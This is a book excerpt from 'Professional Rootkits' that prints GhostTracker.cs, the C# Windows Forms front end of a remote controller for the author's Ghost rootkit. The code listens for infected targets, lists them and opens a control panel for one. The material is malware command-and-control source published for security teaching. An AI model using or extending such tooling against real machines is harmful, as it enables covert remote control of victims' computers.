The file GhostTracker.cs contains a single class, MainForm, with the following member functions:

  • MainForm (constructor)–Initializes and starts the listener thread

  • AddTarget–Adds every new TargetController to the main list control

  • Dispose–Stops the listener thread and cleans up MainForm components

  • Main–The function called when the program is started

  • Alert–A utility to display messages during controller operation

  • targetListView_SelectedIndexChanged –Starts control panels

  // GhostTracker.cs // Copyright Ric Vieler, 2006 // This is a remote controller for the Ghost rootkit using System; using System.Drawing; using System.Collections; using System.ComponentModel; using System.Windows.Forms; using System.Data; using System.Threading; namespace GhostTracker {  /// <summary>  /// Summary description for Form1.  /// </summary>  public class MainForm : System.Windows.Forms.Form  {   TargetController myTarget = null;   Listen myListener = null;   Thread myThread = null;   private System.Windows.Forms.ListView targetListView;   private System.Windows.Forms.ColumnHeader AddressHeader;   private System.Windows.Forms.ColumnHeader InfoHeader;   /// <summary>   /// Required designer variable.   /// </summary>   private System.ComponentModel.Container components = null;   public MainForm()   {    //    // Required for Windows Form Designer support    //   InitializeComponent();   // Create a thread object, passing in the   // Listen.Start method using a ThreadStart delegate.   myListener = new Listen( this );   myThread = new Thread( new ThreadStart( myListener.Start ) );      // Start the listen thread.   myThread.Start();  }  public void AddTarget( TargetController target, string targetAddress, string targetInfo )  {   // Save the TargetController class   myTarget = target;   // Add the target to the list view   string[] columns = new string[3];   // Add Item to the ListView control.   columns[0] = targetAddress;   columns[1] = targetInfo;   columns[2] = "0";   ListViewItem item = new ListViewItem( columns );   this.targetListView.Items.Add( item );   this.targetListView.EnsureVisible( this.targetListView.Items.Count - 1 );  }   /// <summary>   /// Clean up any resources being used.   /// </summary>   protected override void Dispose( bool disposing )   {    if( disposing )    {     if( myThread != null )     {      // Stop the listen thread.      myListener.Stop();      myThread.Abort();      myThread.Join();     }     if (components != null)     {      components.Dispose();     }    }    base.Dispose( disposing );   }   #region Windows Form Designer generated code   ---the code that was here was auto-generated---   #endregion   /// <summary>   /// The main entry point for the application.   /// </summary>   [STAThread]   static void Main()   {    Application.Run(new MainForm());   }   public void Alert( IWin32Window baseControl, string message )   {    // TODO: There seems to be a bug in MessageBox.Show    //       when using the IWin32Window overloads.    //       Dialog "should" be center of App, not screen...    if( baseControl == null )     baseControl = this;    MessageBox.Show( baseControl, message, "GhostTracker",     MessageBoxButtons.OK, MessageBoxIcon.Information);   }   private void targetListView_SelectedIndexChanged(object sender, System.EventArgs e)   {    string targetIP = "";    // Get the selected item    foreach( ListViewItem item in targetListView.Items )    {     targetIP = item.Text;     if( item.Selected )      break;    }    // Launch a controller for the target    ControlForm controller = new ControlForm( targetIP, myTarget );    controller.ShowDialog(this);    // We're done once the target and controller are hooked up   }  } } 

The code within the Windows Form Designer region was removed for clarity. This code was auto-generated and not modified thereafter. See the actual source code file for more information on this region.

Professional Rootkits
Professional Rootkits (Programmer to Programmer)
ISBN: 0470101547
EAN: 2147483647
Year: 2007
Pages: 229
Authors: Ric Vieler

Similar book on Amazon
Rootkits: Subverting the Windows Kernel
Rootkits: Subverting the Windows Kernel
A Guide to Kernel Exploitation: Attacking the Core
A Guide to Kernel Exploitation: Attacking the Core
Reversing: Secrets of Reverse Engineering
Reversing: Secrets of Reverse Engineering
Malware Analyst's Cookbook and DVD: Tools and Techniques for Fighting Malicious Code
Malware Analyst's Cookbook and DVD: Tools and Techniques for Fighting Malicious Code © 2008-2017.
If you may any questions please contact us: